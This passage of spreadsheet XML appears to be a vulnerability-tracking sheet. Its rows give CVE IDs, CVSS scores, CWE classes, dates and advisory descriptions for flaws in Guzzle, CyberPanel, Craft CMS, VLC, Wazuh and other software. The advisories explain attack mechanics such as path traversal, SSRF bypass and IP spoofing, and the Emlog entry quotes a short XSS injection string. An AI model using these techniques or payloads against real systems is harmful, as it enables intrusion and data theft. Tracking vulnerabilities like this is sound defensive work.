      <c r="J3594" s="5" t="inlineStr"/>
      <c r="K3594" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3594" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.14.2 fail to properly isolate Proxy-Authorization headers from origin servers in cURL handlers. Attackers can capture proxy credentials through origin server access logs when requests are redirected, bypassed, or sent through SOCKS proxies that Guzzle misclassifies as direct connections.</t>
        </is>
      </c>
      <c r="M3594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67339</t>
        </is>
      </c>
    </row>
    <row r="3595">
      <c r="A3595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67353</t>
        </is>
      </c>
      <c r="C3595" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3595" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3595" s="5" t="inlineStr"/>
      <c r="F3595" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3595" s="5" t="inlineStr"/>
      <c r="H3595" s="5" t="inlineStr"/>
      <c r="I3595" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3595" s="5" t="inlineStr"/>
      <c r="K3595" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3595" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.15.1 contain a denial of service vulnerability in the CookieJar that accepts unlimited Set-Cookie header fields with no size restrictions. Attackers can return many large cookies from a malicious server, causing Guzzle to store excessive data in memory and generate oversized Cookie headers that fail in handlers or destination servers.</t>
        </is>
      </c>
      <c r="M3595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67353</t>
        </is>
      </c>
    </row>
    <row r="3596">
      <c r="A3596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67440</t>
        </is>
      </c>
      <c r="C3596" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3596" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3596" s="5" t="inlineStr"/>
      <c r="F3596" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3596" s="5" t="inlineStr"/>
      <c r="H3596" s="5" t="inlineStr"/>
      <c r="I3596" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3596" s="5" t="inlineStr"/>
      <c r="K3596" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3596" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, the DEVICE_BROWSE, DEVICE_NODE_ATTRIBUTE, HOST_INTERFACES, and DEVICE_TAGS_REQUEST handlers in server/runtime/index.js return device-discovery, node-attribute, host-network-interface, and device-tag metadata without isSocketAdminAuthorized when secureEnabled is true. A remote unauthenticated or guest user can invoke these metadata-oriented Socket.IO events and collect system-discovery information that is not required for normal public HMI viewing, while ordinary device status, value, alarm, and dashboard events remain intentionally public. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M3596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67440</t>
        </is>
      </c>
    </row>
    <row r="3597">
      <c r="A3597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67613</t>
        </is>
      </c>
      <c r="C3597" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3597" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3597" s="5" t="inlineStr"/>
      <c r="F3597" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3597" s="5" t="inlineStr"/>
      <c r="H3597" s="5" t="inlineStr"/>
      <c r="I3597" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3597" s="5" t="inlineStr"/>
      <c r="K3597" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3597" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 3.0.0 contains a path traversal vulnerability that allows authenticated administrators to read arbitrary files from the server filesystem by supplying unsanitized file paths to the cloudAPI ReadReport endpoint. Attackers can manipulate the reportFile parameter in the JSON request body, which is passed directly to open() in cloudManager.py without validation or allowlisting, enabling traversal to any file readable by the root-privileged CyberPanel process including credential files, SSL and SSH private keys, and JWT secret files.</t>
        </is>
      </c>
      <c r="M3597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67613</t>
        </is>
      </c>
    </row>
    <row r="3598">
      <c r="A3598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69090</t>
        </is>
      </c>
      <c r="C3598" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3598" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3598" s="5" t="inlineStr"/>
      <c r="F3598" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3598" s="5" t="inlineStr"/>
      <c r="H3598" s="5" t="inlineStr"/>
      <c r="I3598" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3598" s="5" t="inlineStr"/>
      <c r="K3598" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3598" s="5" t="inlineStr">
        <is>
          <t>Admidio before 5.0.11 fails to validate target organization membership in role handlers, allowing authenticated role administrators to delete, activate, deactivate, or edit roles belonging to other organizations. Attackers can supply a role UUID from another organization to groups_roles.php handlers to modify that organization's roles without authorization.</t>
        </is>
      </c>
      <c r="M3598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69090</t>
        </is>
      </c>
    </row>
    <row r="3599">
      <c r="A3599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69092</t>
        </is>
      </c>
      <c r="C3599" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3599" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3599" s="5" t="inlineStr"/>
      <c r="F3599" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3599" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3599" s="5" t="inlineStr"/>
      <c r="I3599" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3599" s="5" t="inlineStr"/>
      <c r="K3599" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3599" s="5" t="inlineStr">
        <is>
          <t>Admidio versions before 5.0.11 contain a reflected cross-site scripting vulnerability in the SSO/SAML endpoint that echoes unencoded exception messages to the HTTP response. Unauthenticated attackers can inject arbitrary JavaScript through SAML Issuer elements or LightSaml library parameters to execute code in users' browsers and hijack sessions.</t>
        </is>
      </c>
      <c r="M3599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69092</t>
        </is>
      </c>
    </row>
    <row r="3600">
      <c r="A3600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69198</t>
        </is>
      </c>
      <c r="C3600" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3600" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3600" s="5" t="inlineStr"/>
      <c r="F3600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3600" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3600" s="5" t="inlineStr"/>
      <c r="I3600" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3600" s="5" t="inlineStr"/>
      <c r="K3600" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L3600" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.1.1 until 10.2.2, every special-use classification method is built on isInSubnet, which short-circuits to false whenever the address's own subnet mask is shorter than the reference range's mask. That mask comes verbatim from the CIDR suffix on the parsed input, so appending a suffix such as /0 suppresses classification entirely: isLoopback(), isPrivate(), isLinkLocal(), isCGNAT(), isMulticast(), isUnspecified(), isBroadcast(), isULA(), and getType() all report an internal address as unremarkable, while correctForm() and address still return the real internal target. An application that builds a network trust-boundary decision on these checks, for example a filter intended to block Server-Side Request Forgery, or SSRF, may therefore treat an internal target as external and allow the request. The underlying bit comparison is correct, and mask(n) already returns the first n bits of the full parsed address independently of subnetMask; the defect is solely that the containment guard sits in the classification path. This issue is fixed in version 10.2.2.</t>
        </is>
      </c>
      <c r="M3600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69198</t>
        </is>
      </c>
    </row>
    <row r="3601">
      <c r="A3601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69248</t>
        </is>
      </c>
      <c r="C3601" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3601" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3601" s="5" t="inlineStr"/>
      <c r="F3601" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3601" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3601" s="5" t="inlineStr"/>
      <c r="I3601" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3601" s="5" t="inlineStr"/>
      <c r="K3601" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L3601" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In versions 45.0.0 through 48.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.</t>
        </is>
      </c>
      <c r="M3601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69248</t>
        </is>
      </c>
    </row>
    <row r="3602">
      <c r="A3602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70611</t>
        </is>
      </c>
      <c r="C3602" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3602" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3602" s="5" t="inlineStr"/>
      <c r="F3602" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3602" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H3602" s="5" t="inlineStr"/>
      <c r="I3602" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3602" s="5" t="inlineStr"/>
      <c r="K3602" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3602" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.1, and 42.0.0-beta.3, the DevTools reveal in file manager action could launch the target file rather than reveal it. An attacker with a separate means of running script inside the DevTools frontend, such as a malicious DevTools extension, could use showItemInFolder handling to execute native code outside the sandbox when DevTools is opened for windows exposed to untrusted content or untrusted DevTools extensions. This issue is fixed in 39.8.9, 40.9.2, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M3602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70611</t>
        </is>
      </c>
    </row>
    <row r="3603">
      <c r="A3603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71313</t>
        </is>
      </c>
      <c r="C3603" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3603" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3603" s="5" t="inlineStr"/>
      <c r="F3603" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3603" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3603" s="5" t="inlineStr"/>
      <c r="I3603" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3603" s="5" t="inlineStr"/>
      <c r="K3603" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3603" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From v1.51.0 until v1.75.0, the local backend in backend/local/local.go relies on the configurable filename encoder to prevent remote filename data from becoming operating-system path syntax, so a local destination using Slash, None, Raw, or on Windows an encoding that preserves backslash can decode a standard-encoded fullwidth dot-dot component or native backslash form into an actual parent-directory component before filepath.Join resolves it outside the configured local root, allowing an attacker-controlled source object to create or overwrite files outside the selected destination directory as the rclone process. This issue is fixed in v1.75.0.</t>
        </is>
      </c>
      <c r="M3603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71313</t>
        </is>
      </c>
    </row>
    <row r="3604">
      <c r="A3604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72748</t>
        </is>
      </c>
      <c r="C3604" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3604" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3604" s="5" t="inlineStr"/>
      <c r="F3604" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3604" s="5" t="inlineStr"/>
      <c r="H3604" s="5" t="inlineStr"/>
      <c r="I3604" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3604" s="5" t="inlineStr"/>
      <c r="K3604" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3604" s="5" t="inlineStr">
        <is>
          <t>AVideo contains an unauthenticated arbitrary file write vulnerability in the aVideoEncoderChunk.json.php endpoint that allows remote attackers to write up to 4 GB of arbitrary content to the server filesystem via HTTP PUT requests without authentication. Attackers can exhaust disk space causing denial of service, poison the video encoding pipeline, or chain this with local file inclusion to achieve remote code execution.</t>
        </is>
      </c>
      <c r="M3604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72748</t>
        </is>
      </c>
    </row>
    <row r="3605">
      <c r="A3605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72784</t>
        </is>
      </c>
      <c r="C3605" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3605" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3605" s="5" t="inlineStr"/>
      <c r="F3605" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3605" s="5" t="inlineStr"/>
      <c r="H3605" s="5" t="inlineStr"/>
      <c r="I3605" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3605" s="5" t="inlineStr"/>
      <c r="K3605" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3605" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions &gt;= 5.0.0-RC1 before 5.10.6 and &gt;= 4.0.0-RC1 before 4.18.2 contain a server-side request forgery vulnerability in the GraphQL save&lt;Volume&gt;Asset mutation, which fetches an attacker-supplied URL server-side. The anti-SSRF validation is incomplete: validateIp() does not cover CGNAT (100.64.0.0/10) or NAT64 (64:ff9b::/96) ranges, and the only IP check runs after the request has already been issued. An attacker holding a GraphQL token scoped only to asset-creation permissions can disclose internal HTTP content from CGNAT/NAT64 targets, force outbound GET requests to internal hosts (including RFC1918, loopback, and metadata endpoints), and enumerate internal services.</t>
        </is>
      </c>
      <c r="M3605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72784</t>
        </is>
      </c>
    </row>
    <row r="3606">
      <c r="A3606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72816</t>
        </is>
      </c>
      <c r="C3606" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3606" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3606" s="5" t="inlineStr"/>
      <c r="F3606" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3606" s="5" t="inlineStr"/>
      <c r="H3606" s="5" t="inlineStr"/>
      <c r="I3606" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3606" s="5" t="inlineStr"/>
      <c r="K3606" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L3606" s="5" t="inlineStr">
        <is>
          <t>go-chi/chi through 5.2.1 contains an IP spoofing vulnerability in the RealIP middleware (middleware/realip.go). The realIP() function reads client-controlled headers (True-Client-IP, X-Real-IP, and X-Forwarded-For) and overwrites r.RemoteAddr without verifying that the request originated from a trusted proxy. Attackers can supply arbitrary IP addresses in these headers to bypass IP-based access controls, evade rate limiting and geo-IP restrictions, and pollute audit logs. Fixed in 5.3.0.</t>
        </is>
      </c>
      <c r="M3606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72816</t>
        </is>
      </c>
    </row>
    <row r="3607">
      <c r="A3607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72817</t>
        </is>
      </c>
      <c r="C3607" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3607" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3607" s="5" t="inlineStr"/>
      <c r="F3607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3607" s="5" t="inlineStr"/>
      <c r="H3607" s="5" t="inlineStr"/>
      <c r="I3607" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3607" s="5" t="inlineStr"/>
      <c r="K3607" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3607" s="5" t="inlineStr">
        <is>
          <t>go-chi/chi versions 0.9.0 before 5.3.0 contains an IP spoofing vulnerability in the RealIP middleware, which resolves the request source IP (Request.RemoteAddr) using the first IP in the X-Forwarded-For header without validating trusted proxies. A malicious client can prepend a forged IP as the first value of the X-Forwarded-For header to spoof the request source IP, potentially bypassing access controls or falsifying request logs.</t>
        </is>
      </c>
      <c r="M3607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72817</t>
        </is>
      </c>
    </row>
    <row r="3608">
      <c r="A3608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72820</t>
        </is>
      </c>
      <c r="C3608" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3608" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3608" s="5" t="inlineStr"/>
      <c r="F3608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3608" s="5" t="inlineStr"/>
      <c r="H3608" s="5" t="inlineStr"/>
      <c r="I3608" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3608" s="5" t="inlineStr"/>
      <c r="K3608" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3608" s="5" t="inlineStr">
        <is>
          <t>Grav versions before 2.0.13 fail to properly validate backup profile root paths, allowing attackers to archive directories outside GRAV_ROOT when not in the hard-coded deny-list. Attackers with profile editor access can configure backup profiles with traversal paths to expose sensitive files from locations like /opt, /mnt, or /srv.</t>
        </is>
      </c>
      <c r="M3608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72820</t>
        </is>
      </c>
    </row>
    <row r="3609">
      <c r="A3609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73324</t>
        </is>
      </c>
      <c r="C3609" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3609" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3609" s="5" t="inlineStr"/>
      <c r="F3609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3609" s="5" t="inlineStr"/>
      <c r="H3609" s="5" t="inlineStr"/>
      <c r="I3609" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3609" s="5" t="inlineStr"/>
      <c r="K3609" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-170</t>
        </is>
      </c>
      <c r="L3609" s="5" t="inlineStr">
        <is>
          <t>VLC media player copies an RTSP response line into a fixed buffer without guaranteeing termination and then treats that buffer as a C string. RtspReadLine in modules/access/rtsp/access.c calls strncpy with the full buffer length, which writes no terminator when the source line is at least as long as the destination, and rtsp_get in modules/access/rtsp/rtsp.c allocates that buffer as BUF_SIZE bytes and passes it to strdup. When a server returns a line of 4096 bytes or more, strdup measures its length past the end of the allocation and copies adjacent heap bytes until an incidental zero byte. Because the affected line is the Session header, the disclosed bytes are retained as the session identifier and sent back to the server on every subsequent request, so the operator of a hostile server reads heap memory from the client rather than inferring it. The attacker controls the line length and therefore how far the read runs. A single playlist entry naming a realrtsp URL is sufficient. The module is a build-time option, disabled in some distribution packages and enabled in the official VideoLAN builds.</t>
        </is>
      </c>
      <c r="M3609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73324</t>
        </is>
      </c>
    </row>
    <row r="3610">
      <c r="A3610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73848</t>
        </is>
      </c>
      <c r="C3610" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3610" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3610" s="5" t="inlineStr"/>
      <c r="F3610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3610" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3610" s="5" t="inlineStr"/>
      <c r="I3610" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3610" s="5" t="inlineStr"/>
      <c r="K3610" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3610" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, tag names in emlog are not HTML-encoded when rendered in the article editor. An attacker can create a tag containing ');alert(document.domain);//. The addslashes() function does not escape HTML entities, so ' is stored as-is. When the browser renders the page, it decodes ' back to a literal single quote before evaluating the JavaScript, breaking out of the string and executing arbitrary code. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M3610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73848</t>
        </is>
      </c>
    </row>
    <row r="3611">
      <c r="A3611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74046</t>
        </is>
      </c>
      <c r="C3611" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3611" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3611" s="5" t="inlineStr"/>
      <c r="F3611" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3611" s="5" t="inlineStr"/>
      <c r="H3611" s="5" t="inlineStr"/>
      <c r="I3611" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3611" s="5" t="inlineStr"/>
      <c r="K3611" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L3611" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.4.0 before 4.14.7 contains a denial of service vulnerability in the fdecompress_files() function within cluster.py that allows authenticated cluster peers to exhaust memory by supplying a malicious synchronization archive without decompressed size limits. Attackers holding a valid cluster Fernet key can upload a small, highly compressed zip bomb archive that forces wazuh-clusterd on the master node to decompress the full payload into memory, causing memory exhaustion and service disruption.</t>
        </is>
      </c>
      <c r="M3611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74046</t>
        </is>
      </c>
    </row>
    <row r="3612">
      <c r="A3612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74235</t>
        </is>
      </c>
      <c r="C3612" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3612" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3612" s="5" t="inlineStr"/>
      <c r="F3612" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3612" s="5" t="inlineStr"/>
      <c r="H3612" s="5" t="inlineStr"/>
      <c r="I3612" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3612" s="5" t="inlineStr"/>
      <c r="K3612" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3612" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains a path traversal vulnerability in the system maintenance configuration download handler. The wcf_handle_download() function accepts parameters prefixed with v_del_ and appends their values directly to the base configuration directory path without sanitizing for directory traversal sequences. An authenticated attacker with Admin privileges can read arbitrary files from the system in the context of root.</t>
        </is>
      </c>
      <c r="M3612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74235</t>
        </is>
      </c>
    </row>
    <row r="3613">
      <c r="A3613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74871</t>
        </is>
      </c>
      <c r="C3613" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3613" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3613" s="5" t="inlineStr"/>
      <c r="F3613" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3613" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H3613" s="5" t="inlineStr">
        <is>
          <t>jahlives:openssl_encrypt</t>
        </is>
      </c>
      <c r="I3613" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3613" s="5" t="inlineStr"/>
      <c r="K3613" s="5" t="inlineStr">
        <is>
          <t>CWE-916</t>
        </is>
      </c>
      <c r="L3613" s="5" t="inlineStr">
        <is>
          <t>openssl_encrypt versions before 1.4.6 contain a key derivation flaw in sequential XOR composition mode where the last stage cancels out during key generation. When configured with a single KDF and no prior hashing stage, attackers can bypass memory-hard key derivation and perform offline password cracking at SHA-256 speed instead of the configured KDF cost.</t>
        </is>
      </c>
      <c r="M3613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74871</t>
        </is>
      </c>
    </row>
    <row r="3614">
      <c r="A3614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75125</t>
        </is>
      </c>
